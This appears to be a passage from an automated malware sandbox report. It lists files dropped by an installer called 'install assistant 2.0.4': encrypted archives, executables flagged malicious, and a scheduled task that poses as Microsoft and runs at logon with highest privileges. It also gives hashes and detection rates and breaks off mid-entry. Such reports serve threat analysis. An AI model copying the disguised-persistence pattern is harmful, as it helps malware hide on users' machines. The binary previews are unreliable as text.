                                                        Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):31890
                                                        Entropy (8bit):7.99402458740637
                                                        Encrypted:true
                                                        SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                                        MD5:8622FC7228777F64A47BD6C61478ADD9
                                                        SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                                        SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                                        SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                                        Malicious:false
                                                        Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):31890
                                                        Entropy (8bit):7.99402458740637
                                                        Encrypted:true
                                                        SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                                        MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                                        SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                                        SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                                        SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                                        Malicious:false
                                                        Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):74960
                                                        Entropy (8bit):7.99759370165655
                                                        Encrypted:true
                                                        SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                                        MD5:950338D50B95A25F494EE74E97B7B7A9
                                                        SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                                        SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                                        SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                                        Malicious:false
                                                        Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):74960
                                                        Entropy (8bit):7.997593701656546
                                                        Encrypted:true
                                                        SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                                        MD5:059BA7C31F3E227356CA5F29E4AA2508
                                                        SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                                        SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                                        SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                                        Malicious:false
                                                        Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):29730
                                                        Entropy (8bit):7.994290657653607
                                                        Encrypted:true
                                                        SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                                        MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                                        SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                                        SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                                        SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                                        Malicious:false
                                                        Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):29730
                                                        Entropy (8bit):7.994290657653608
                                                        Encrypted:true
                                                        SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                                        MD5:A9C8A3E00692F79E1BA9693003F85D18
                                                        SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                                        SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                                        SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                                        Malicious:false
                                                        Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:dropped
                                                        Size (bytes):250000
                                                        Entropy (8bit):7.999233217470124
                                                        Encrypted:true
                                                        SSDEEP:6144:1CV1oCvUxznH9Oxyyt42fnM+KhFtVbiOO:AV1o4Wzn9l2/HonbiP
                                                        MD5:8ABFBD435E4C97ADECC98054531BDB10
                                                        SHA1:45EE0AE577F885C664C7CBB9465DC3F5602D52DC
                                                        SHA-256:2D6F169B3A86F7A5167C882D6AC0C600C4BDB50751D63873F77673EB01C6FB0F
                                                        SHA-512:EB62FA8CF7B481EC94368A4329E599FFE891DF489F8D3DB51B1A6CA5637BBD3C397ACD3FE6025732315A072ABE7059CFB97A7E20DB31991C80C5F63F83918C18
                                                        Malicious:false
                                                        Preview:7z..'......0.......@........m.m.A..8..!K.`.GQ.........F..`:*!.Q..i..3..+..W..$.-....z.G.[4E.T.h.z!.k2.3.CMY1>....!y..>...i..zBb...K..$...i..{...@....}8.3^.J..u...7..R.a]..(aiRWE.P..ib<...X.0...o.v.lY...l.]_.7........C....{.r.1...Zf.)2fN-"HO.Z.0....s...kjO!.....I.-Hg...:7..k.kl...a..!....=...D.........yk..i...x..H..O.W..a..t..-m..B. ..z..G.~.P..e.dN......U.y.....7....R..~..h..*01i.Bty...q.Y+.8I..N.Q....w..^....u.._..D......2.....-.....M..w.u.[.>WzW.s....U.......%....>...8-...6.p..: .=P..cH..:UA.^.<.....P..@.^t..T.;.W&.Y....Q...@8P...4t...cr.zN....8.R)..m..:I..".7...r..o0:0.......@1.8..L#...l.%^.a21....L.c4.wc........_....a...".o...ge.#.`.{-.+.@o.....r,j..h<.!;......F.}....J..!..V..b..z....&!/.l.1...l.......rh..2.....8...v..Ie...mP.T..1D..TZs..Q.lc....&.b.[.7...A.)J.[..Z......q..n...r...n..........o....F.....0t...!.7.....Vj.._....a...r`.$..#11...^..{.4.]...]..+.......Q....,.}....'l..-.Ee.\n]....3..;]0.!.i.6fj.......e...R......$....qT
                                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):63640
                                                        Entropy (8bit):6.482810107683822
                                                        Encrypted:false
                                                        SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                                        MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                                        SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                                        SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                                        SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                        • Antivirus: Virustotal, Detection: 4%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4096
                                                        Entropy (8bit):3.344834847024567
                                                        Encrypted:false
                                                        SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                                                        MD5:7F252B19B6E96247184F55570325E9FA
                                                        SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                                                        SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                                                        SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                                                        Malicious:false
                                                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):5649408
                                                        Entropy (8bit):6.392614480390128
                                                        Encrypted:false
                                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):64
                                                        Entropy (8bit):1.1940658735648508
                                                        Encrypted:false
                                                        SSDEEP:3:NlllulXg+//lz:NllUwu/l
                                                        MD5:ED0FF51DEEE7DB96EC9C5624C12E0A04
                                                        SHA1:515B7FC63DB9F9313A6AEE6B4A6266B0FB6FF3A7
                                                        SHA-256:B93B1F8411ACBB11CBECF0F4E344D7D6D3551801BD891B816FB4720E60CE357B
                                                        SHA-512:FD82F7D0B1B6F1641D2FF3F4EC6FEF66E2AB0F2048D7A5BBC674C379DD429516198FFD6E6E445C6EC1A2763ADAACF6288026B4A90697D86C8EED743A71F177ED
                                                        Malicious:false
                                                        Preview:@...e.................................F..............@..........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3366912
                                                        Entropy (8bit):6.530548291878271
                                                        Encrypted:false
                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                        Malicious:true
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3366912
                                                        Entropy (8bit):6.530548291878271
                                                        Encrypted:false
                                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                        Malicious:true
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):6144
                                                        Entropy (8bit):4.720366600008286
                                                        Encrypted:false
                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3598848
                                                        Entropy (8bit):7.004949099807939
                                                        Encrypted:false
